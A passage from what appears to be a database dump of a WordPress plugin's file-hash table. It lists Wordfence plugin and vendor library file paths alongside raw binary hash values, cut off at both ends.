Ȟu','',0,'?'),('EB3A-\r&!T','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CG\ndnMv','篺wFO^ `&|p.0E)\ZL','',0,'?'),('sݜÞ3','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nc0)נZ;b','5KO5QJÂPpUW','',0,'?'),('uC~7\nWe','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n9Lu?7','qVvWDgб~rnL','',0,'?'),('mAp	1GU/','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q)\Z6ˏr1\n1ڑ','$I.\Zڴ}\'iD50V-B(','',0,'?'),('Fm','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<>sZKze','̆;nE!Z\ZVV Hw','',0,'?'),('k7|dT;','wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZɵP! r','wXXl@gIz,>W7\rX','',0,'?'),('낏\r?8[9kQ\'s','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8E7CS','dقM.N8U8ࠆOY=wD','',0,'?'),('2?!u܆\"','wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[(AɊh','ͳߘQ6̨!*XxMMu@','',0,'?'),('\Z&cR< FiC','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r%1cvG\\%','-r@Yik~oeɲv*+','',0,'?'),('j\nj<c@BX','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3qטwUͰR','JwYwun[&DFLV-2L','',0,'?'),('I<UCMdZ','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VIބŌ._','ёli߉.N /siTj!l','',0,'?'),('wDI-EIl','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T%a;B3>|CX','B;,y_:$E5B0\0','',0,'?'),('F\ruDb7','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pVF&KkH','+.^-$70	]xrv+cgPM','',0,'?'),('|:xZ~*wl','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6G5n;E>','Q2Ƽw|!l?sTMmu*({','',0,'?'),('\rP)4_\"\'1','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nυ	L?06C','\'-OR\"Nxn~l<W','',0,'?'),('*沫QN','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1hIbۓa','6NSNY2m=@ke(!z|g','',0,'?'),('/qRR|','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R!z@;Ve','#l#к;	KAH9Q@	B~','',0,'?'),('$QsPR3}/','wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>N.RyEEn','0Q~0Sbgsx:E my\\O','',0,'?'),('8=[ձ','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~PG$!2(s`','פ:yRJ`l|BHw75!','',0,'?'),('CIS7<','wp-content/plugins/wordfence/modules/login-security/views/page/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\0~;L޾','DT}3=T$\\Z\rY/E','',0,'?'),('\ZL6N1;8','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"w^\nk6','!5@a6to5(Ds\nKf','',0,'?'),('g[z\0ή','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MQ@ǮI','~rbwTNs;3fB)A','',0,'?'),('T\rfV+ j','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxXJTbx','fx/xG\n856	Z+','',0,'?'),('˩6f/6YjI\0W','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XUt\\HD','w>Ȗ@UFg݃{=-ڪ5','',0,'?'),('Yg$zH.Y','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uD~Fe	U',';\ne@dw`4g\r','',0,'?'),('dkJQAw6im<B1','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\ZrABČ',')\ZJ _W)\0\\s{VW̤','',0,'?'),('vFI2hn','wp-content/plugins/wordfence/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I&by\ZvAs','O\Z6k*YB03&drټM','',0,'?'),(';Lt׬Cɣ','wp-content/plugins/wordfence/tmp/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Iz~i,L','	HQIqzڤp9C4>H3G','',0,'?'),('\"C*.','wp-content/plugins/wordfence/vendor/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),('=S6aXo,2','wp-content/plugins/wordfence/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nV8\\Bs','7h>8but^^Rx26#i(','',0,'?'),('_k4!*}݄ ','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|%*T*`','289vu3n	C2sva/','',0,'?'),('0&Y','wp-content/plugins/wordfence/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']_#D\0','\Z ے%4~N~Gh!b:wɌ\'','',0,'?'),('\"0rN1M#','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EӤ㭇Mg','Q*\'B+Eߞ:myuW','',0,'?'),('t!\Z%\n','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5,}vĨ3G)','Er4@\0ԡ$z3$l\Z`iexl','',0,'?'),('s˱Y*uO','wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*qBItӟA<\"','6qQ`d!cf.Bxq','',0,'?'),('~Ӹbc\Z$@$*','wp-content/plugins/wordfence/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+>r*mI','E\0.¿¯1F(Dfuv˔','',0,'?'),('!֐(yJo*J','wp-content/plugins/wordfence/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B\\BH+)	','84E3I6-9!zGL5','',0,'?'),('k}:VNG','wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x>PHe6[GF5','q!홐%ހP٧Hr.L~','',0,'?'),('p1	?J@','wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǧn3Q2G','d\"fݎ6em`zP<KO','',0,'?'),('O=h\0}OrLb','wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZU~L5@\ZVU','/rTrmGс\r%e\r|[','',0,'?'),(']mٲ	▭','wp-content/plugins/wordfence/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>w̩	&J)','M,P:k\nN2[s\nWze]oN','',0,'?'),('6N]bNR','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڄ q?s1U','REkks&]!i_\"y~Ka','',0,'?'),('ECW``-','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_@e3bB','Lؤ@J9OhG@@Z!\08#l(','',0,'?'),('ccgu','wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';8e_TƽW','ݬISP\"a 7J6QSv_y','',0,'?'),('k|DD*@4','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nAgv1Pص','0o*\rvAo3:juy','',0,'?'),(']jRX','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','//Rj.','3\'X\ro`/D/3\Z','',0,'?'),('ZgUi1iƾx=','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dW,XEEo','l?)&&PP$@\\/','',0,'?'),('{Z\n0D\rOM*Ut','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N	SX?z','Ԧ\nٲLKY1%X7~*','',0,'?'),('퇴u46','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lfk<\r\n','R!O]pI\n\\VP9=!?','',0,'?'),('K?ra#Qh','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IaRɞ%x','M bd]FiPOZq','',0,'?'),('^4j|I','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5H*f$ʝӐ','ƝiczP1\"ݢӛoTWry*F','',0,'?'),('܆R(\'2WhpG','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ҏHC5̨[\0','Xf:Mt˃#sD4(NGF','',0,'?'),('[0^','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','emgݜ|<뼸Dh','+%G<t1]I5m\Z}E>;','',0,'?'),('vV5ǃDu','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڄ\n1h;!','Mϡ	pk)!\r','',0,'?'),('QKQ95Ɣ`','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Y!\\zJX','B*yL˰au\"t\Z4Z۳Nk¥','',0,'?'),('+b\nDfX2YC','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS:-N!Q0\"','6)?^\"F*g|&RΠ\0	','',0,'?'),('eiy,:T)','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Q#2ЏR','~G)R7i-#R 9Hǫ b','',0,'?'),('%~WN82QO','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4F0JC nk','Cb,\"\">jŊAlD','',0,'?'),(']r:@I','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6:2kP3','%uMp,.\0@Zqr/Q','',0,'?'),('%D?m1QZ\"cAXQq','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G=1\nV0','8}>k6`uideHP^','',0,'?'),('Dmuϣ!I5H','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pٽP]G','| )YM,30\Z*9p','',0,'?'),('V<r\nQ]jvXP','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z*Nfټ{','i˶|1v.4[(m@f>','',0,'?'),('J?#͌$M7c','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`I.:`PR','#zR\ZHU>BnP,\'eTtߺ','',0,'?'),('MӼ7T~','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$kA`lwy','7\r4	춥Q\nc>c\n>Pf84Hk','',0,'?'),('wejZqI','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(,Eڎ;','5+SsY>%r975[I=`<2M','',0,'?'),(':1()p]V1-ȩ','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qDLa[	?$','Gs\0\r/1v=pS-yE.U','',0,'?'),('݈3+P\r','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',0Z%','g^M9=&*M{Xb0*u','',0,'?'),('\rBeׯE7','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y}`8vFJ','U߆([r嵳gh嬵!m9(\"','',0,'?'),('k1/͓ݐ%=','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dqd6+\"U','Is;֮ikE@)','',0,'?'),('F[㵋Pѳ@','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MbP\"xY@0','\'n*2nԋ)a(_Iqɘ{','',0,'?'),('&ɚ%)W&i','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>XVDm|P6\n','l=b:џ	RZ		6','',0,'?'),('P[DXPa','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';uSl','M>:\r&V`\Z:O0Sv;\0Vw','',0,'?'),('tV<C','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';HoĴ`׳m%','(l]hЮa	yfh0v\'uvm','',0,'?'),('&Yzq[Ff@','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ⶨ;*?z',':O.\'~y@Y`FMN:n.;q@','',0,'?'),('`I,y oY','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';8e_TƽW','ݬISP\"a 7J6QSv_y','',0,'?'),('d=@hs:k}','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#lJPe0ug۔','UWMslL9#TbWj?\\u','',0,'?'),('T.)m&I','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','41l#}pzk1','h	_֚!E4\ZvF','',0,'?'),('ؽ)uҶewl','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mhOലf.I','oOb9_b-4-x%T5E9\'','',0,'?'),('\Z3H{ǲ','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r Ϭn+n','^qNТ&yN~\'S//>}p','',0,'?'),('])TN25F','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GR˗c?qt','֝Rz5B,nɲ\nHoڨ|','',0,'?'),('-[S_عQ','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1:!G~qic','^DCguPT!>W\Zk~_5\n8','',0,'?'),('2]&֔#^Fq','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2΢	/E!<s','\\=53	ώv_%2A?$','',0,'?'),('85\\Rqo-=','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h$x /','<bobnAE7_GK','',0,'?'),('ȿ-`uo','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','am;SV#mI','R9F47i}ʧC^%','',0,'?'),('m>\00X&^Q','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pKz`)9_@','aғYeq7YTcȊi$Wت/!,','',0,'?'),('ۅnPE6T','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KdWؿEW','RW].dasJMLq+p},','',0,'?'),('ӎA}ҎWZ5=*t','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b;v\'g~k','m!MJ\"v>,0\0՜ɫ &jِ','',0,'?'),('i\Z![8$\"','wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';8e_TƽW','ݬISP\"a 7J6QSv_y','',0,'?'),('SdlzsV7','wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V~МIXP/$','sem/;֘ aZH`g3','',0,'?'),('%\\(w&','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\0$K  	','Vp\Z1͌э\'=~ٲF_u\\P','',0,'?'),('ϏRCOh','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','06.tzxo',';p^\03Թ( Aaw','',0,'?'),('O5e;hzw@W','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z<{~Gf(',',ב[\Z@+?xPА','',0,'?'),('k%\r0̯IN6D\'y','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g+کdݬ@','wbjYStc IdQ','',0,'?'),('\Z[`0CI$T\'','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')H$I3^0','Dsmr?vjzMo3=b0KR#','',0,'?'),('~iI;ݭ]AS','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','54⓿`','DOo;oO]+\05]/\"޸&Q','',0,'?'),('I6U\r73p','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h<|7b','_^F\";+r&Z~ӦQ|5','',0,'?'),('nvZYV','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`I,Bz1','Q52<iiNKOb2d','',0,'?'),('BJOzD','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{1MRKE_/','|qUUѿÎ|zG>*ۜ\"I;','',0,'?'),('Pdc3','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<i\"KNX,','Cѝ⁪r+^YhjzZ','',0,'?'),('^Q6lJ!	ͦ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d#k','tw}?e	hBT92uCv7','',0,'?'),('߹V=\"#n	','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xb#!YiJ','nd@=[cg?N}־Rxl]X','',0,'?'),('rMܴ-\nS','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(wٯ(_','b<Wr,M۫Pp>Nn','',0,'?'),('X/\0	','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6٤pOl^','L*c&\Z]\n9uҐóL_Qj&v','',0,'?'),('n09jv8\"','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CVS+:c|O쬋	','t=1i\Zn\0N!*iF','',0,'?'),('ҭ_VlKg!p1','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','бilGqv-','>-$m	\ZT0kT`lk`*ͼ','',0,'?'),('!O4bCRRfO','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zzn','Ei!p\0\'R5R$#','',0,'?'),('IW9aW3(','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\n4x%$0','^,5؎j,ҧQQhs','',0,'?'),('c[b]ݽJF','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\\4','!ʁ)wj%pջڞ56q袌m#w','',0,'?'),('СqD֚?iX','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kh009b|C.','UFωK%ɗym=#TY9M','',0,'?'),('\'`F̔~Ė','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C؍0+C','`>&i(ŹCf&>Y\"','',0,'?'),('<xB','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gP r摧u\\','A,Z<oAfw!','',0,'?'),('\n@g+T;V','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\r@)뻚',';_Im1\n9|!޶','',0,'?'),('8K ?O]ʹY','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZlY^[F\r2xʻ','6=Sq-5 )EL}AViA]','',0,'?'),('xVM>n{Oǟ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','96N\Z!JYU',',yS1̥;x5GiO9','',0,'?'),('Aػ#\"j','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z]\0(Xz','茏P.)g8]4B5U;>JfÖ3}','',0,'?'),('Q6K4H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R\0nW[_','\rM#:A{qcD/>','',0,'?'),('rI\0ygE!2\0C','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o?MH|~E\"\'','o}[W%J+=5$)\'2ΨK','',0,'?'),('j)nQ8ޮD','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yw2!_','xؑpw>oO׀L%#lH','',0,'?'),('{ \rSlſ	','wp-content/plugins/wordfence/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),(':f?bj.','wp-content/plugins/wordfence/views/blocking/block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LYPͺK\ne',']SO	o*+uX:ʆw','',0,'?'),('r7/y*aڛP] 0','wp-content/plugins/wordfence/views/blocking/blocking-create.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4JPЩsB','r~5\n̊4GșA','',0,'?'),('fpjH\'','wp-content/plugins/wordfence/views/blocking/blocking-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˮ_Xk','4>1^fs{q\'	ީM','',0,'?'),('hx*(&kO','wp-content/plugins/wordfence/views/blocking/country-block-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uyGF,{Xz','%Ԝ5;x^)G(o','',0,'?'),('4ہ;0.*','wp-content/plugins/wordfence/views/blocking/country-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-^A?','axR;,\'K?QߦH','',0,'?'),('m5^u9>','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PAf0	/ (w1X','IRR\nߎd;I3G','',0,'?'),('1?ox<?6','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"5y \"\'f','agLSSPU:̈p5Q<>Fr','',0,'?'),('4ToiEt','wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','䜮`Su8','h]sUsj=(GfvacS','',0,'?'),('2ģ_Dx','wp-content/plugins/wordfence/views/common/block-navigation-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O~}t.K','MNF`\r9